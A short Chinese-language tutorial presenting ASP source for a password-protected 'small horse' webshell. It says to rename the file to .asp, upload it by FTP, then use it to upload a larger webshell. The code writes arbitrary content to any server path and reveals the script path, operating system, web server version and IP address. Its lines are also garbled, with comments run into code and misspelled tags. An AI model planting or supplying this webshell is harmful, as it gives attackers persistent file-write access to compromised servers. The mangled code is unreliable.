将代码写入txt 文档中编辑完成后将后缀改为asp上传到FTP中

<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<title>小马</title><%
on error resume Next '忽略页面的错误'if request("pass")="longoatian" then '设置密码，如果POST过来的form的表单的“pass”属性的值为longaotian则执行下一行'session("pw")="go" '给session的属性“pw”赋值“go”'end if
if session("pw")<>"go" then '如果session中的“pw”属性值不等于“go”则显示一个登陆框'response.write "<center><br><from action='' method='post'>"response.write "<input name='pass' type='password' size='10'> <input type='submit' value='我要进去'></center>"
else '或者执行下面的代码'set fso=server.createobject("scripting.filesystemobject")'创建一个FSO 的对象，用于操作磁盘、文件夹或文本文件，它是IIS 的内置组件'
path=request("path")'变量“path”（文件的保存路径）等于from表单POST过来的“path”属性的值'
if path<>"" then '如果变量“path”不为空，也就是提交了指定的路径'data=request("da")'变量“data”（保存的文件内容）等于from表单POST过来的“da”属性的值'set da=fso.createtextfile(path,true)'创建一个文件操作对象“da”，第一个参数表示写入的绝对路径，第二个参数true表示覆盖写入'da.write data'将“data”里面的数据写入到da对象中（也就是写入到指定的路径path中，以覆盖的形式）'
if err=0 then'err对象等于零时表示没有错误，写入成功'response.write "yes"'到页面上输出一个yes'
elseresponse.write "no"'到页面上输出一个no'
end if
err.clear
end if
da.close
set da=nothing
set fos=nothing'页面表单，显示服务器一些基本信息，以及显示一个提交的表单用于写入木马'response.write "<from action='' method=post>"response.write "<input type=text name=path><br />"response.write "当前文件路径:"&server.mappath(request.servervariables("script_name"))response.write "<br /> 操作系统为:"&request.servervariables("os")response.write "<br /> WEB服务器版本为:"&request.servervariables("server_software")response.write "<br /> 服务器的ip为:"&request.servervariables("local_addr")&"<br>"response.write "<textarea name=da cols=50 rows=10 width=30></textarea><br><input type=submit value=save></from><font face='黑体' color='red'> longaotian </font>"
end if%>
</body></html>

完成后打开输入密码即可上传大马。